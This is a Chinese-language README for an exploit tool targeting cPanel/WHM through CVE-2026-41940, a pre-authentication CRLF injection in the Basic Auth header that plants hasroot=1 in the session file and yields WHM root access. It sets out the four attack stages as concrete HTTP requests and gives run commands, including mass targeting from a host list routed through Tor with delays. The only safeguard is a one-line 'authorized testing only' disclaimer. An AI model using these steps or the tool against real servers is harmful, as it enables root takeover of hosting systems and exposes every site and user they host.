cPanel/WHM 安全测试工具包。实现了 CVE-2026-41940 CRLF 注入认证绕过及后渗透权限提升。
| 脚本 | 用途 |
|---|---|
cpanel_exploit.py | CVE-2026-41940:CRLF 注入 → WHM 认证绕过 → root 访问 |
类型: CRLF 注入 → 认证绕过 → Root RCE
影响范围: cPanel/WHM < 已修补版本
攻击方式: Basic Auth 头中的预认证 CRLF 注入将 hasroot=1 注入服务端会话文件,将未认证会话提升为 WHM root。
阶段 1:POST /login/?login_only=1 → 生成预认证会话
阶段 2:GET / Authorization:Basic <CRLF> → 注入 hasroot=1,泄露 cpsess 令牌
阶段 3:GET /scripts2/listaccts → 触发会话缓存传播小工具
阶段 4:GET /cpsess[TOKEN]/json-api/version → HTTP 200 + 版本 = ROOT 访问
pip install requests
python cpanel_exploit.py -t target.com
python cpanel_exploit.py -l whm_hosts.txt --tor --delay 2
python cpanel_exploit.py -t target.com --verify-only # 仅 CRLF 检查,不进行权限提升
仅限授权渗透测试使用。